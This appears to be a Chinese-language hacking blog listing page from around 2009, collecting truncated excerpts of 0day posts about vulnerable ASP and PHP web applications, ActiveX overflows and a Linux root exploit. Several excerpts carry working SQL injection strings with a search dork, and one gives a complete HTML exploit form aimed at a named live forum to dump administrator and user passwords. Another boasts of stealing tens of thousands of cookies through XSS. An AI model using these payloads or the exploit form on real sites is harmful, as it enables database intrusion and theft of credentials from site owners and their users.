【白银时代】备注:转载请注明:んㄗ葑訫鎖愛’S Blog http://www.virusest.com shopxp网上购物系统 v7.4存在Sql注入漏洞。 问题文件:xpCatalog_xpDesc.asp,xpCatalog_xpsmall_Desc.asp 问题代码: <% dim shopxpbe_id, anclassname, shopxpse_id, nclassname dim totalPut dim CurrentPage, TotalPages if request(“shopxpbe_id”)<>”"...
阅读更多”志坚网络新闻系统1.0d存在Cookies注入漏洞
【白银时代】备注:不是什么知名系统,挖掘不到什么大的利用价值。 涉及到的文件大致有pindaolist.asp,pinlist.asp,class.asp,article.asp,均存在Cookies注入。 问题代码如下:<% anid=request(“anid”) banshi=request(“banshi”) set rsan=server.CreateObject(“adodb.recordset”) rsan.Open “select * from anclass where...
阅读更多”PPstream 2.6.86.8900 PPSMediaList ActiveX Remote BOF”
【白银时代】备注:POC是放出来了,可是EXP我不知道怎么写……汗 <!– ****************************************************************************** PPStream is the most huge p2p media player in the world. There are two hundred million ppstream users in the world. The vulnerability is exploitable,but I have no time to make it,you could visit my blog for detail.^@^ welcome to http://0dayexpose.blogspot.com/ COM...
阅读更多”Linux内核20天内连爆两高危漏洞,一个命令又可以获得root权限(貌似是”
【白银时代】备注:我没学过Linux,所以没有发言权…… Linux内核漏洞最近几乎是一月一爆,在8月15号才爆了一个几乎通杀所有版本所有内核所有架构的内核漏洞;今天在学生返校的大喜日子里,竟然又爆了一个,通杀内核2.6 < 2.6.19的所有32位Linux,算是google security team给祖国学生的礼物吧。 linux的一个localroot,IIS5/6 FTP的remote...
阅读更多”Fly_flash 0.1 release
【白银时代】备注:80sec的牛人太多了。汗 fly_flash — Jump/XSS/CSRF in Flash Author: lake2@80sec.com Site: http://www.80sec.com Date: 2009-8-26 From: http://www.80sec.com/release/fly_flash.txt 80SEC — know it then hack it ! [ description ] fly_flash is a tool for penetration in flash [ usage ] upload fly_flash.swf and fly_flash.txt to your server in same directory, embed fly_flash.swf in other website, modify the...
阅读更多”某私服0day
【白银时代】备注:杀伤力巨大…… 关键字:inurl:/xqgslist.asp 点开新闻或者文章,随意点开一个页面。 注入语句:xor 1=2 union select 1,2,adminname,adminpwd,5 from...
阅读更多”CSDN中文编程社区xxs 0DAY
【白银时代】备注:天阳看见有人发了,果然很猛。原帖地址:http://bbs.tian6.com/thread-14470-1-1.html 今天测试了下~ (ps:CSDN的童鞋不要怪我哈~ 你们的密码我都没乱扔)几分钟后盗了60多K的cookies~ 登陆了下~ 都可以,XXS还是挺好玩儿的~ ,手下留情没有弄管理员~ 所以就不要说我有什么企图了~ 完全没有的~...
阅读更多”sablog1.6的CSRF漏洞POC
sablog1.6的CSRF漏洞POC。
这个在我的blog中测试成功,官方下载的最新版本测试成功,但是在小泽的blog失败的。
原因是他自己修改了源程序,判断了referer。
POC:
SHELL代码
- 评论时,网站地址输入:http://www.inbreak.net/blog ...
”飞天论坛asp版通杀 0day利用程序【貌似是luoye】
【白银时代】备注:不要乱来,今年抓的蛮严的……
Copy code<center><H1>飞天论坛asp版通杀 0day利用程序</H1></center>... 阅读更多
<form method=post name="luoye">
目标地址:<input name="act" type="text" id="act" size="140" value="http://bbs.0127.cn/"><br><br>
注入语句:<input type=text size=150 name=userid value="1 and 1=2 union select 1,2,admin_pwd,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37
,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58 from ftbbs_admin"><br><br>
<input type=submit value=Fuck onClick="javascript:luoye.action=document.all.act.value+'haoyou.asp';">
<br><br><br><br>
<font color=red>爆所有管理员用户名时,把admin_pwd改为admin_user</font><br><br>
<font color=red>爆所有论坛用户数据时,把表名改为clubuser,用户名字段是clubuser_nickname;密码字段是clubuser_password</font><br><br>
<font color=red>如果想爆单一用户或管理员的数据,请自行加where语句,参考:id、clubuserid</font><br><br>
”暴风影音貌似又出漏洞了(BaoFeng ActiveX OnBeforeVideoDow”
【白银时代】备注:目前还没有成型的EXP被放出来,我等小菜只能眼巴巴的等大牛放出来啦……
milw0rm.com上面4月30号放出来的,具体应用我是不懂啦,不过看样子貌似有点意思……
#
# BaoFeng (mps.dll) Remote Code Execution Exploit
# By: MITBOY
# Download: www.baofeng.com
...
”iShowMusic V1.2 直接写shell漏洞
【白银时代】备注:请勿用于非法用途,由此造成的后果小的概不负责,请直接联系原作者……
By qiur3n
iShow Music 是一套基本于PHP+TXT的在线音乐播放程序。程序采用文本数据存储方式,无需MYSQL数据库支持,同时程序代码与界面模板分离,方便你的音乐网站界面修改。
官方网站:http://www.ishowsky.cn
在error.php 12-26行复制内容到剪贴板代码:
elseif ($_POST['action']=="save"){
...
相关日志
- 建站之星SiteStar V2.0 漏洞 (6)
- N点虚拟主机系统致命漏洞0day (1)
- 通杀IIS7.0畸形解析0day漏洞(类似Nginx那个0day)附带视频演示 (14)
- phpcms2008 SP3 0day+exp,附带利用方法 (2)
- ECSHOP 2.7.X注入漏洞[附EXP利用工具] (8)
- 乐旅旅游网站管理系统 v1.7.3 Oday (2)
- DedeCms v5.5 0day (9)
- ESCMS cookies欺骗0day (5)
- Word 通杀溢出生成器(0day?) (7)
- windows最新0day 本地提权 源码+利用工具 通杀所有版本XP 2K 2K3 2K8 VISTA WIN7 (6)
热门标签
链接表
